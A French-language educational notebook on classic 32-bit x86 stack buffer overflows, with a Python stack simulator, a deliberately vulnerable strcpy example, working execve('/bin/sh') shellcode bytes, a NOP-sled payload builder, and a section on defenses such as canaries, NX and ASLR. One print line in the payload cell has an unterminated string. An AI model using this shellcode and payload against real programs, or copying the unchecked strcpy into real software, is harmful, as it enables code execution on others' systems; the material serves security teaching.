# Démonstration : Buffer Overflow sur Systèmes 32-bits

Ce notebook explique et simule des attaques par buffer overflow sur architectures x86 (32-bits).

⚠️ **AVERTISSEMENT** : Ce contenu est à but éducatif uniquement. L'exploitation de vulnérabilités sans autorisation est **illégale**.

## 📚 Concepts couverts

1. **Layout mémoire** (stack, heap, .text, .data, .bss)
2. **Stack frame** et organisation
3. **Buffer overflow** classique (stack-based)
4. **Exploitation** : Overwrite return address
5. **Défenses** : Stack canaries, NX bit, ASLR
6. **ROP** (Return-Oriented Programming)

---

In [ ]:
import struct
from typing import List, Dict
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches

## 1. Layout Mémoire d'un Processus (32-bits)

### Organisation classique

```
Adresses hautes (0xFFFFFFFF)
┌─────────────────────────────┐
│  Kernel Space               │
├─────────────────────────────┤ 0xC0000000
│  Stack (grows down ↓)       │ ← ESP
│  - Variables locales        │
│  - Return addresses         │
│  - Saved EBP                │
├─────────────────────────────┤
│  ...                        │
│  (unused)                   │
│  ...                        │
├─────────────────────────────┤
│  Heap (grows up ↑)          │
│  - malloc()                 │
│  - new                      │
├─────────────────────────────┤
│  .bss (uninitialized data)  │
│  - int x;                   │
├─────────────────────────────┤
│  .data (initialized data)   │
│  - int x = 10;              │
├─────────────────────────────┤
│  .text (code)               │
│  - Instructions             │
│  - Read-only                │
└─────────────────────────────┘ 0x08048000
Adresses basses (0x00000000)
```

In [ ]:
def visualize_memory_layout():
    """Visualise le layout mémoire"""
    fig, ax = plt.subplots(figsize=(10, 8))
    
    # Segments mémoire (adresse, hauteur, nom, couleur)
    segments = [
        (0.0, 0.2, ".text (code)", "lightblue"),
        (0.2, 0.15, ".data (init data)", "lightgreen"),
        (0.35, 0.1, ".bss (uninit data)", "lightyellow"),
        (0.45, 0.3, "Heap ↑", "lightcoral"),
        (0.75, 0.0, "(unused)", "white"),
        (0.75, 0.2, "Stack ↓", "lightpink"),
        (0.95, 0.05, "Kernel", "lightgray"),
    ]
    
    for y_start, height, label, color in segments:
        if height > 0:
            rect = mpatches.Rectangle((0, y_start), 0.8, height, 
                                      linewidth=2, edgecolor='black', 
                                      facecolor=color)
            ax.add_patch(rect)
            ax.text(0.4, y_start + height/2, label, 
                   ha='center', va='center', fontsize=12, weight='bold')
    
    # Annotations d'adresses
    ax.text(0.85, 0.0, "0x08048000", va='bottom', fontsize=10)
    ax.text(0.85, 0.95, "0xC0000000", va='top', fontsize=10)
    ax.text(0.85, 1.0, "0xFFFFFFFF", va='top', fontsize=10)
    
    # Flèches de croissance
    ax.annotate('', xy=(0.9, 0.65), xytext=(0.9, 0.50),
                arrowprops=dict(arrowstyle='->', lw=2, color='red'))
    ax.text(0.92, 0.575, 'Heap grows up', fontsize=9, color='red')
    
    ax.annotate('', xy=(0.9, 0.85), xytext=(0.9, 0.90),
                arrowprops=dict(arrowstyle='->', lw=2, color='blue'))
    ax.text(0.92, 0.875, 'Stack grows down', fontsize=9, color='blue')
    
    ax.set_xlim(0, 1.2)
    ax.set_ylim(0, 1.0)
    ax.set_aspect('equal')
    ax.axis('off')
    ax.set_title('Process Memory Layout (32-bit x86)', fontsize=14, weight='bold')
    
    plt.tight_layout()
    plt.show()

visualize_memory_layout()

## 2. Organisation du Stack Frame

Lorsqu'une fonction est appelée, un **stack frame** est créé :

```
Adresses hautes
┌───────────────────────────┐
│  Arguments                │ [EBP + 8], [EBP + 12], ...
├───────────────────────────┤
│  Return Address           │ [EBP + 4]  ← Cible du buffer overflow!
├───────────────────────────┤
│  Saved EBP (old frame)    │ [EBP]      ← EBP pointe ici
├───────────────────────────┤
│  Local Variable 1         │ [EBP - 4]
├───────────────────────────┤
│  Local Variable 2         │ [EBP - 8]
├───────────────────────────┤
│  Buffer[64]               │ [EBP - 72] ← Overflow démarre ici
└───────────────────────────┘
Adresses basses              ← ESP
```

### Déroulement d'un appel de fonction

```asm
; Appelant (caller)
push arg2          ; Empile arguments (droite à gauche)
push arg1
call function      ; Empile EIP (return address) et saute

; Début de fonction (callee)
push ebp           ; Sauvegarde l'ancien EBP
mov ebp, esp       ; EBP = ESP (nouveau frame)
sub esp, 72        ; Alloue 72 bytes pour variables locales

; Code de la fonction...

; Retour de fonction
mov esp, ebp       ; Restaure ESP
pop ebp            ; Restaure EBP
ret                ; Pop return address → EIP (retour)
```

In [ ]:
class StackSimulator:
    """Simule un stack 32-bits simplifié"""
    
    def __init__(self, size=1024):
        # Stack démarre en haut (adresses hautes)
        self.memory = bytearray(size)
        self.esp = size  # Stack Pointer (top of stack)
        self.ebp = size  # Base Pointer
        self.base_address = 0xbffff000  # Adresse de base simulée
    
    def push(self, value: int, size: int = 4):
        """Empile une valeur (4 bytes par défaut)"""
        self.esp -= size
        if size == 4:
            struct.pack_into('<I', self.memory, self.esp, value)
        elif size == 1:
            self.memory[self.esp] = value & 0xFF
    
    def pop(self, size: int = 4) -> int:
        """Dépile une valeur"""
        if size == 4:
            value = struct.unpack_from('<I', self.memory, self.esp)[0]
        else:
            value = self.memory[self.esp]
        self.esp += size
        return value
    
    def get_address(self, offset: int) -> int:
        """Retourne l'adresse absolue simulée"""
        return self.base_address + offset
    
    def write_buffer(self, offset: int, data: bytes):
        """Écrit des données à un offset (simule strcpy, etc.)"""
        for i, byte in enumerate(data):
            if offset + i < len(self.memory):
                self.memory[offset + i] = byte
    
    def read_dword(self, offset: int) -> int:
        """Lit un DWORD (4 bytes) à un offset"""
        return struct.unpack_from('<I', self.memory, offset)[0]
    
    def dump_stack(self, count: int = 20):
        """Affiche le contenu du stack"""
        print("\n" + "=" * 70)
        print("STACK DUMP")
        print("=" * 70)
        
        for i in range(count):
            offset = self.esp + (i * 4)
            if offset + 4 <= len(self.memory):
                value = self.read_dword(offset)
                addr = self.get_address(offset)
                
                # Marque ESP et EBP
                marker = ""
                if offset == self.esp:
                    marker = " ← ESP"
                elif offset == self.ebp:
                    marker = " ← EBP"
                
                print(f"0x{addr:08x}: 0x{value:08x}  [{value:10d}]{marker}")

# Démonstration d'un stack frame
print("=" * 70)
print("DÉMONSTRATION: Stack Frame d'une fonction")
print("=" * 70)

stack = StackSimulator(size=256)

# Simule l'appel de fonction: vulnerable_function(arg1=0x1234, arg2=0x5678)
print("\n1️⃣  Caller empile les arguments:")
stack.push(0x5678)  # arg2
stack.push(0x1234)  # arg1
print(f"   push 0x5678  (arg2)")
print(f"   push 0x1234  (arg1)")

print("\n2️⃣  Instruction CALL empile return address:")
return_address = 0x08048abc  # Adresse de retour simulée
stack.push(return_address)
print(f"   push 0x{return_address:08x}  (return address)")

print("\n3️⃣  Function prologue:")
old_ebp = stack.ebp
stack.push(old_ebp)  # Sauvegarde ancien EBP
stack.ebp = stack.esp  # EBP = ESP
print(f"   push ebp")
print(f"   mov ebp, esp")

print("\n4️⃣  Alloue espace pour variables locales (72 bytes):")
local_vars_size = 72
stack.esp -= local_vars_size
print(f"   sub esp, {local_vars_size}")

print(f"\n📍 État actuel:")
print(f"   ESP = 0x{stack.get_address(stack.esp):08x}  (top of stack)")
print(f"   EBP = 0x{stack.get_address(stack.ebp):08x}  (base pointer)")

# Dump du stack
stack.dump_stack(count=25)

## 3. Buffer Overflow Classique

### Code Vulnérable

```c
#include <string.h>

void vulnerable_function(char *input) {
    char buffer[64];           // Buffer de 64 bytes
    strcpy(buffer, input);     // PAS de vérification de taille!
}

int main(int argc, char **argv) {
    vulnerable_function(argv[1]);
    return 0;
}
```

### Exploitation

Si `input` dépasse 64 bytes, `strcpy` écrit au-delà du buffer et **écrase** :
1. Les variables locales
2. Le **saved EBP**
3. La **return address** ← 🎯 Cible!

En contrôlant la return address, l'attaquant redirige l'exécution vers du code arbitraire.

In [ ]:
def simulate_buffer_overflow():
    """Simule un buffer overflow"""
    print("=" * 70)
    print("SIMULATION: Buffer Overflow Attack")
    print("=" * 70)
    
    stack = StackSimulator(size=256)
    
    # Setup du stack frame (comme précédemment)
    stack.push(0x5678)  # arg2
    stack.push(0x1234)  # arg1
    return_address = 0x08048abc
    stack.push(return_address)
    old_ebp = stack.ebp
    stack.push(old_ebp)
    stack.ebp = stack.esp
    
    # Alloue 72 bytes (dont 64 pour le buffer)
    buffer_offset = stack.esp - 64
    stack.esp -= 72
    
    print(f"\n📋 Configuration initiale:")
    print(f"   Buffer at     : 0x{stack.get_address(buffer_offset):08x}")
    print(f"   Saved EBP at  : 0x{stack.get_address(stack.ebp):08x}")
    print(f"   Return addr at: 0x{stack.get_address(stack.ebp + 4):08x}")
    print(f"   Return value  : 0x{return_address:08x}")
    
    # Cas 1: Input légitime (safe)
    print("\n" + "=" * 70)
    print("CAS 1: Input légitime (32 bytes)")
    print("=" * 70)
    
    safe_input = b"Hello, this is safe input!\x00"
    stack_safe = StackSimulator(size=256)
    # Reconstruit le même état
    stack_safe.push(0x5678)
    stack_safe.push(0x1234)
    stack_safe.push(return_address)
    stack_safe.push(old_ebp)
    stack_safe.ebp = stack_safe.esp
    buf_off = stack_safe.esp - 64
    stack_safe.esp -= 72
    
    stack_safe.write_buffer(buf_off, safe_input)
    
    print(f"\nInput: {safe_input.decode('utf-8', errors='ignore')}")
    print(f"Length: {len(safe_input)} bytes")
    
    ret_addr_after = stack_safe.read_dword(stack_safe.ebp + 4)
    print(f"\n✅ Return address intacte: 0x{ret_addr_after:08x}")
    print("   → Fonction retournera normalement")
    
    # Cas 2: Buffer overflow (malicious)
    print("\n" + "=" * 70)
    print("CAS 2: Buffer Overflow Attack (100 bytes)")
    print("=" * 70)
    
    # Payload structure:
    # [64 bytes padding] + [4 bytes fake EBP] + [4 bytes new return address]
    padding = b"A" * 64
    fake_ebp = struct.pack('<I', 0x42424242)  # "BBBB"
    shellcode_address = 0xdeadbeef  # Adresse du shellcode
    new_return = struct.pack('<I', shellcode_address)
    
    malicious_input = padding + fake_ebp + new_return
    
    stack.write_buffer(buffer_offset, malicious_input)
    
    print(f"\n🎯 Payload:")
    print(f"   [64 bytes 'A'] + [fake EBP: 0x42424242] + [return: 0x{shellcode_address:08x}]")
    print(f"   Total length: {len(malicious_input)} bytes")
    
    saved_ebp_after = stack.read_dword(stack.ebp)
    ret_addr_after = stack.read_dword(stack.ebp + 4)
    
    print(f"\n❌ Stack corrompu:")
    print(f"   Saved EBP : 0x{saved_ebp_after:08x} (était 0x{old_ebp:08x})")
    print(f"   Return addr: 0x{ret_addr_after:08x} (était 0x{return_address:08x})")
    
    if ret_addr_after == shellcode_address:
        print(f"\n💀 EXPLOITATION RÉUSSIE!")
        print(f"   → Fonction retournera à 0x{shellcode_address:08x} (shellcode)")
        print(f"   → Exécution de code arbitraire!")
    
    # Visualisation du stack
    print("\n" + "=" * 70)
    print("STACK APRÈS OVERFLOW")
    print("=" * 70)
    stack.dump_stack(count=20)

simulate_buffer_overflow()

## 4. Shellcode

Le **shellcode** est du code machine injecté pour exécuter des commandes.

### Exemple : execve("/bin/sh") sur Linux x86

```asm
; execve("/bin/sh", NULL, NULL)
xor eax, eax       ; EAX = 0
push eax           ; NULL terminator
push 0x68732f2f    ; "//sh"
push 0x6e69622f    ; "/bin"
mov ebx, esp       ; EBX = pointer to "/bin//sh"
xor ecx, ecx       ; ECX = NULL (argv)
xor edx, edx       ; EDX = NULL (envp)
mov al, 0x0b       ; syscall number (execve = 11)
int 0x80           ; syscall
```

### Shellcode bytes (25 bytes)

In [ ]:
# Shellcode classique execve("/bin/sh")
shellcode_execve = (
    b"\x31\xc0"              # xor eax, eax
    b"\x50"                  # push eax
    b"\x68\x2f\x2f\x73\x68"  # push 0x68732f2f ("//sh")
    b"\x68\x2f\x62\x69\x6e"  # push 0x6e69622f ("/bin")
    b"\x89\xe3"              # mov ebx, esp
    b"\x31\xc9"              # xor ecx, ecx
    b"\x31\xd2"              # xor edx, edx
    b"\xb0\x0b"              # mov al, 0x0b
    b"\xcd\x80"              # int 0x80
)

print("=" * 70)
print("SHELLCODE: execve(\"/bin/sh\")")
print("=" * 70)

print(f"\nLongueur: {len(shellcode_execve)} bytes")
print(f"\nBytes (hex):")

# Affiche en format lisible
for i in range(0, len(shellcode_execve), 16):
    chunk = shellcode_execve[i:i+16]
    hex_str = " ".join(f"{b:02x}" for b in chunk)
    ascii_str = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
    print(f"  {i:04x}:  {hex_str:<48s}  {ascii_str}")

print("\n📝 Ce shellcode:")
print("   1. Construit la chaîne \"/bin//sh\\x00\" sur le stack")
print("   2. Configure les registres pour syscall execve")
print("   3. Appelle int 0x80 (syscall)")
print("   → Lance un shell /bin/sh")

print("\n⚠️  Contraintes du shellcode:")
print("   ✓ Pas de bytes NULL (\\x00) → casse strcpy")
print("   ✓ Position-independent (peut être placé n'importe où)")
print("   ✓ Taille minimale")

## 5. NOP Sled (technique)

Le **NOP sled** facilite l'exploitation en augmentant la probabilité de sauter dans le shellcode.

### Principe

```
┌──────────────────────────────────┐
│  NOP NOP NOP NOP ... (200 bytes) │  ← Return address pointe ici (approximatif)
├──────────────────────────────────┤
│  Shellcode (25 bytes)            │  ← Exécution glisse jusqu'ici
├──────────────────────────────────┤
│  Fake EBP (4 bytes)              │
├──────────────────────────────────┤
│  Return Address (4 bytes)        │  ← Pointe vers le milieu du NOP sled
└──────────────────────────────────┘
```

### Avantage

Pas besoin de connaître l'adresse exacte du shellcode. Pointer vers **n'importe où** dans le NOP sled fonctionne !

In [ ]:
def create_exploit_payload(buffer_size=64, shellcode_addr=0xbffff500):
    """Crée un payload d'exploitation complet avec NOP sled"""
    
    print("=" * 70)
    print("CRÉATION D'UN PAYLOAD D'EXPLOITATION")
    print("=" * 70)
    
    # NOP instruction (0x90)
    NOP = b"\x90"
    
    # Shellcode
    shellcode = shellcode_execve
    
    # Calcul des tailles
    nop_sled_size = buffer_size - len(shellcode) - 4  # -4 pour fake EBP
    nop_sled = NOP * nop_sled_size
    
    fake_ebp = struct.pack('<I', 0x42424242)
    
    # Return address pointe vers le milieu du NOP sled
    return_addr = struct.pack('<I', shellcode_addr + nop_sled_size // 2)
    
    # Assemblage du payload
    payload = nop_sled + shellcode + fake_ebp + return_addr
    
    print(f"\n📦 Structure du payload:")
    print(f"   NOP sled      : {nop_sled_size} bytes (0x90 * {nop_sled_size})")
    print(f"   Shellcode     : {len(shellcode)} bytes")
    print(f"   Fake EBP      : 4 bytes (0x42424242)")
    print(f"   Return address: 4 bytes (0x{shellcode_addr + nop_sled_size // 2:08x})")
    print(f"   ────────────────────────────────")
    print(f"   Total         : {len(payload)} bytes")
    
    print(f"\n🎯 Stratégie d'exploitation:")
    print(f"   1. NOP sled commence à ~0x{shellcode_addr:08x}")
    print(f"   2. Return address pointe vers 0x{shellcode_addr + nop_sled_size // 2:08x}")
    print(f"   3. CPU exécute NOPs jusqu'au shellcode")
    print(f"   4. Shellcode lance /bin/sh")
    
    # Visualisation ASCII
    print(f"\n📊 Visualisation:")
    print("   " + "┌" + "─" * 60 + "┐")
    print(f"   │ {' NOP SLED (0x90 * {nop_sled_size})':<59s}│")
    print("   ├" + "─" * 60 + "┤")
    print(f"   │ {' SHELLCODE (execve)':<59s}│")
    print("   ├" + "─" * 60 + "┤")
    print(f"   │ {' Fake EBP: 0x42424242':<59s}│")
    print("   ├" + "─" * 60 + "┤")
    print(f"   │ {f' Return Addr: 0x{shellcode_addr + nop_sled_size // 2:08x}':<59s}│ ← Overwrites
    print("   └" + "─" * 60 + "┘")
    
    return payload

payload = create_exploit_payload(buffer_size=64, shellcode_addr=0xbffff500)

print("\n" + "=" * 70)
print("PAYLOAD GÉNÉRÉ (premiers 100 bytes)")
print("=" * 70)
for i in range(0, min(100, len(payload)), 16):
    chunk = payload[i:i+16]
    hex_str = " ".join(f"{b:02x}" for b in chunk)
    ascii_str = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
    print(f"  {i:04x}:  {hex_str:<48s}  {ascii_str}")

## 6. Défenses contre Buffer Overflow

### 6.1 Stack Canaries (Stack Protector)

Un **canary** est une valeur aléatoire placée entre le buffer et la return address.

```
┌─────────────────┐
│  Return Address │
├─────────────────┤
│  Saved EBP      │
├─────────────────┤
│  CANARY (random)│ ← Vérifié avant le return
├─────────────────┤
│  Buffer[64]     │
└─────────────────┘
```

Avant de retourner, la fonction vérifie que le canary est intact. Si modifié → **abort()**.

**Compilation** : `gcc -fstack-protector-all`

In [ ]:
import random

class StackWithCanary:
    """Simule un stack avec stack canary"""
    
    def __init__(self):
        self.stack = StackSimulator(size=256)
        # Génère un canary aléatoire (4 bytes)
        self.canary = random.randint(0x10000000, 0xFFFFFFFF)
        print(f"🔒 Stack canary généré: 0x{self.canary:08x}")
    
    def setup_frame_with_canary(self):
        """Configure un stack frame avec canary"""
        # Arguments
        self.stack.push(0x5678)
        self.stack.push(0x1234)
        
        # Return address
        self.return_address = 0x08048abc
        self.stack.push(self.return_address)
        
        # Saved EBP
        old_ebp = self.stack.ebp
        self.stack.push(old_ebp)
        self.stack.ebp = self.stack.esp
        
        # CANARY ← Inséré ici!
        self.canary_offset = self.stack.esp - 4
        self.stack.push(self.canary)
        
        # Buffer (64 bytes)
        self.buffer_offset = self.stack.esp - 64
        self.stack.esp -= 64
        
        print(f"\n📋 Stack frame avec canary:")
        print(f"   Buffer at     : 0x{self.stack.get_address(self.buffer_offset):08x}")
        print(f"   Canary at     : 0x{self.stack.get_address(self.canary_offset):08x}")
        print(f"   Saved EBP at  : 0x{self.stack.get_address(self.stack.ebp):08x}")
        print(f"   Return addr at: 0x{self.stack.get_address(self.stack.ebp + 4):08x}")
    
    def write_to_buffer(self, data: bytes):
        """Écrit dans le buffer (simule strcpy)"""
        self.stack.write_buffer(self.buffer_offset, data)
    
    def check_canary(self) -> bool:
        """Vérifie l'intégrité du canary"""
        current_canary = self.stack.read_dword(self.canary_offset)
        
        if current_canary == self.canary:
            print("\n✅ Canary intact: Stack non corrompu")
            return True
        else:
            print(f"\n🚨 STACK SMASHING DETECTED!")
            print(f"   Expected canary: 0x{self.canary:08x}")
            print(f"   Found canary   : 0x{current_canary:08x}")
            print(f"   → abort() appelé, programme terminé")
            return False

# Test avec canary
print("=" * 70)
print("DÉMONSTRATION: Stack Canary Protection")
print("=" * 70)

# Cas 1: Input légitime
print("\n--- Test 1: Input légitime ---")
stack1 = StackWithCanary()
stack1.setup_frame_with_canary()
safe_input = b"Hello World!\x00"
stack1.write_to_buffer(safe_input)
stack1.check_canary()

# Cas 2: Buffer overflow
print("\n" + "=" * 70)
print("--- Test 2: Buffer Overflow (détecté par canary) ---")
stack2 = StackWithCanary()
stack2.setup_frame_with_canary()

# Payload qui overflow et écrase le canary
malicious = b"A" * 64 + b"CANR" + struct.pack('<I', 0x42424242) + struct.pack('<I', 0xdeadbeef)
stack2.write_to_buffer(malicious)
stack2.check_canary()

print("\n💡 Impact:")
print("   → L'exploitation est détectée AVANT le retour de fonction")
print("   → Programme terminé, pas d'exécution de code arbitraire")

### 6.2 NX Bit (DEP - Data Execution Prevention)

Le **NX bit** marque certaines pages mémoire comme **non-exécutables**.

```
┌────────────────────┐
│ Stack (NX)         │ ← Pas d'exécution possible
├────────────────────┤
│ Heap (NX)          │ ← Pas d'exécution possible
├────────────────────┤
│ .data (NX)         │ ← Pas d'exécution possible
├────────────────────┤
│ .text (RX)         │ ← Read + Execute (code légitime)
└────────────────────┘
```

**Impact** : Le shellcode sur le stack ne peut pas être exécuté → Segmentation Fault

**Compilation** : `gcc -z noexecstack`

**Contournement** : **ROP** (Return-Oriented Programming)

---

### 6.3 ASLR (Address Space Layout Randomization)

**ASLR** randomise les adresses de :
- Stack
- Heap
- Bibliothèques partagées (.so)
- Position des exécutables (PIE)

**Impact** : L'attaquant ne peut plus prédire où placer la return address

**Activation** (Linux) : `echo 2 > /proc/sys/kernel/randomize_va_space`

**Contournement** :
- **Information leak** : Divulguer une adresse pour calculer les autres
- **Brute force** : Sur 32-bits, l'espace d'adressage est limité

---

### 6.4 Compilation Flags

```bash
# Sans protection (vulnérable)
gcc -o vuln vuln.c -fno-stack-protector -z execstack -no-pie

# Avec toutes les protections
gcc -o secure vuln.c -fstack-protector-all -z noexecstack -pie -fPIE -D_FORTIFY_SOURCE=2
```

---

## 📊 Résumé des défenses

| Défense | Objectif | Contournement |
|---------|----------|---------------|
| **Stack Canary** | Détecte corruption du stack | Leak canary, overwrite sans toucher canary |
| **NX Bit (DEP)** | Empêche exécution sur stack/heap | ROP (Return-Oriented Programming) |
| **ASLR** | Randomise adresses mémoire | Information leak, brute force (32-bits) |
| **PIE** | Randomise adresse du code | Information leak |
| **RELRO** | Protège GOT/PLT | Difficile à bypass |

---

## 🎯 Points clés

1. **Buffer overflow** permet de contrôler la return address
2. **Shellcode** exécute des commandes arbitraires
3. **NOP sled** facilite l'exploitation
4. **Défenses modernes** rendent l'exploitation plus difficile mais pas impossible
5. **Defense in depth** : Combiner plusieurs protections
6. **Langages memory-safe** (Rust, Go) éliminent la classe entière de vulnérabilités

---

## 🔗 Références

- **Smashing The Stack For Fun And Profit** (Aleph One, 1996)
- **The Shellcoder's Handbook** (Anley et al.)
- **ROP Exploitation** : https://en.wikipedia.org/wiki/Return-oriented_programming
- **ASLR on Linux** : https://linux-audit.com/linux-aslr-and-kernelrandomize_va_space-setting/